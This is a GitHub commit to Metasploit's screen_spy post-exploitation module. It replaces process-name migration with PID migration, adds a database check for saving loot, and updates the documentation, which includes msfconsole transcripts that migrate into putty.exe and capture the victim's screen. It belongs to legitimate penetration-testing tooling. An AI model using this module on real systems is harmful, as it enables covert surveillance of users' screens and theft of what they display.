Skip to content

Commit

Permalink
Update module with more checks and replace the Process migration stra…
Browse files Browse the repository at this point in the history
…tegy with a PID migration strategy. Also update documentation accordingly
  • Loading branch information
gwillcox-r7 committed Apr 12, 2021
1 parent 7a828b5 commit 0b06904
Show file tree
Hide file tree
Showing 2 changed files with 127 additions and 45 deletions.
122 changes: 106 additions & 16 deletions documentation/modules/post/windows/gather/screen_spy.md
Original file line number Diff line number Diff line change
Expand Up @@ -20,27 +20,117 @@ be viewed from the Metasploit interface.

## Options

**SESSION**
### SESSION
The session to run the module on.

The session to run the module on.
### RECORD
If set to true, record all screenshots to disk by saving them to loot.

### PID
PID to migrate into before taking the screenshots. If no PID is specified, default to current PID.

## Scenarios

### Windows 7 (6.1 Build 7601, Service Pack 1).
### Windows 10 20H2 (No Database Connected But RECORD Flag Set)
```
msf6 exploit(multi/handler) > use post/windows/gather/screen_spy
msf6 post(windows/gather/screen_spy) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/screen_spy) > show options
Module options (post/windows/gather/screen_spy):
Name Current Setting Required Description
---- --------------- -------- -----------
COUNT 6 yes Number of screenshots to collect
DELAY 5 yes Interval between screenshots in seconds
PID no PID to migrate into before taking the screenshots
RECORD true yes Record all screenshots to disk by saving them to loot
SESSION 1 yes The session to run this module on.
VIEW_SCREENSHOTS false no View screenshots automatically
msf6 post(windows/gather/screen_spy) > set SESSION 2
SESSION => 2
msf6 post(windows/gather/screen_spy) > run
[*] Capturing 6 screenshots with a delay of 5 seconds
[-] RECORD flag specified however the database is not connected, so no loot can be stored!
[*] Post module execution completed
```

### Windows 10 20H2 (No Database Connected, RECORD flag not set)
```
msf6 exploit(multi/handler) > use post/windows/gather/screen_spy
msf6 post(windows/gather/screen_spy) > set SESSION 2
SESSION => 2
msf6 post(windows/gather/screen_spy) > set RECORD false
RECORD => false
msf6 post(windows/gather/screen_spy) > set VIEW_SCREENSHOTS true
VIEW_SCREENSHOTS => true
msf6 post(windows/gather/screen_spy) > show options
Module options (post/windows/gather/screen_spy):
Name Current Setting Required Description
---- --------------- -------- -----------
COUNT 6 yes Number of screenshots to collect
DELAY 5 yes Interval between screenshots in seconds
PID no PID to migrate into before taking the screenshots
RECORD false yes Record all screenshots to disk by saving them to loot
SESSION 2 yes The session to run this module on.
VIEW_SCREENSHOTS true no View screenshots automatically
msf6 post(windows/gather/screen_spy) > run
[*] Capturing 6 screenshots with a delay of 5 seconds
[*] Screen Spying Complete
[*] Post module execution completed
msf6 post(windows/gather/screen_spy) >
```

### Windows 10 20H2 (No Database Connected, RECORD flag not set, PID set to Process to Migrate To)
```
msf6 exploit(multi/handler) > use post/windows/gather/screen_spy
msf6 post(windows/gather/screen_spy) > set SESSION 2
SESSION => 2
msf6 post(windows/gather/screen_spy) > set RECORD false
RECORD => false
msf6 post(windows/gather/screen_spy) > set VIEW_SCREENSHOTS true
VIEW_SCREENSHOTS => true
msf6 post(windows/gather/screen_spy) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > ps -aux
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
.....
8236 1288 taskhostw.exe
8296 760 svchost.exe
8424 888 RuntimeBroker.exe x64 2 DESKTOP-KUO5CML\test C:\Windows\System32\RuntimeBroker.exe
8572 3340 MeSuAx.exe
8636 760 svchost.exe
8664 8036 putty.exe x64 2 DESKTOP-KUO5CML\test C:\Program Files\PuTTY\putty.exe
.....
```
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49184) at 201 9-12-12 14:55:42 -0700
meterpreter > background
[*] Backgrounding session 2...
msf6 post(windows/gather/screen_spy) > set PID 8664
PID => 8664
msf6 post(windows/gather/screen_spy) > run
[+] Migration successful
[*] Capturing 6 screenshots with a delay of 5 seconds
[*] Screen Spying Complete
[*] Post module execution completed
msf6 post(windows/gather/screen_spy) >
```

msf > use post/windows/gather/screen_spy
msf post(windows/gather/screen_spy) > set SESSION 1
SESSION => 1
msf post(windows/gather/screen_spy) > run
### Windows 10 20H2 (Database Connected, RECORD flag set)
```
[*] Migrating to explorer.exe pid: 1908
[+] Migration successful
[*] Capturing 6 screenshots with a delay of 5 seconds
[*] Screen Spying Complete
[*] run loot -t screenspy.screenshot to see file locations of your newly acquired loot
[*] Post module execution completed
```
```
50 changes: 21 additions & 29 deletions modules/post/windows/gather/screen_spy.rb
Original file line number Diff line number Diff line change
Expand Up @@ -26,7 +26,7 @@ def initialize(info={})
'bannedit', # post module
'kernelsmith <kernelsmith /x40 kernelsmith /x2E com>', # record/loot support,log x approach, nx
'Adrian Kubok', # better record file names
'DLL_Cool_J' # Specify process to migrate into
'DLL_Cool_J' # Specify PID to migrate into
],
'Platform' => ['win'], # @todo add support for posix meterpreter somehow?
'SessionTypes' => ['meterpreter']
Expand All @@ -37,8 +37,8 @@ def initialize(info={})
OptInt.new('DELAY', [true, 'Interval between screenshots in seconds', 5]),
OptInt.new('COUNT', [true, 'Number of screenshots to collect', 6]),
OptBool.new('VIEW_SCREENSHOTS', [false, 'View screenshots automatically', false]),
OptBool.new('RECORD', [true, 'Record all screenshots to disk by looting them', true]),
OptString.new('PROCESS', [false, 'Specify process name to migrate into', ''])
OptBool.new('RECORD', [true, 'Record all screenshots to disk by saving them to loot', true]),
OptString.new('PID', [false, 'PID to migrate into before taking the screenshots', ''])
])
end

Expand All @@ -50,18 +50,12 @@ def record?
datastore['RECORD']
end

def process?
datastore['PROCESS']
end



def run
host = session.session_host
screenshot = Msf::Config.get_config_root + "/logs/" + host + ".jpg"

# if no process is specified, don't migrate.
if datastore['PROCESS'] != ''
# If no PID is specified, don't migrate.
if datastore['PID'] != ''
migrate
end

Expand Down Expand Up @@ -92,11 +86,15 @@ def run
return false
end
if data

if record?
# let's loot it using non-clobbering filename, even tho this is the source filename, not dest
fn = "screenshot.%0#{leading_zeros}d.jpg" % num
file_locations << store_loot("screenspy.screenshot", "image/jpg", session, data, fn, "Screenshot")
if framework.db.active
# let's loot it using non-clobbering filename, even tho this is the source filename, not dest
fn = "screenshot.%0#{leading_zeros}d.jpg" % num
file_locations << store_loot("screenspy.screenshot", "image/jpg", session, data, fn, "Screenshot")
else
print_error('RECORD flag specified however the database is not connected, so no loot can be stored!')
return false
end
end

# also write to disk temporarily so we can display in browser.
Expand All @@ -121,7 +119,7 @@ def run
return
end
print_status("Screen Spying Complete")
if file_locations and not file_locations.empty?
if record? && file_locations and not file_locations.empty?
print_status "run loot -t screenspy.screenshot to see file locations of your newly acquired loot"
end

Expand All @@ -140,19 +138,13 @@ def run
end

def migrate
pid = session.sys.process.getpid
session.sys.process.get_processes.each do |p|
if p['name'] == datastore['PROCESS'] and p['pid'] != pid
print_status("Migrating to #{datastore['PROCESS']} pid: #{p['pid']}")
begin
session.core.migrate(p['pid'].to_i)
print_good("Migration successful")
return p['pid']
rescue
print_bad("Migration failed")
return nil
end
end
begin
session.core.migrate(datastore['PID'].to_i)
print_good("Migration successful")
return datastore['PID']
rescue
fail_with(Failure::Unknown, "Migration failed! Unable to take a screenshot under the desired process!")
return nil
end
end
end

0 comments on commit 0b06904

Please sign in to comment.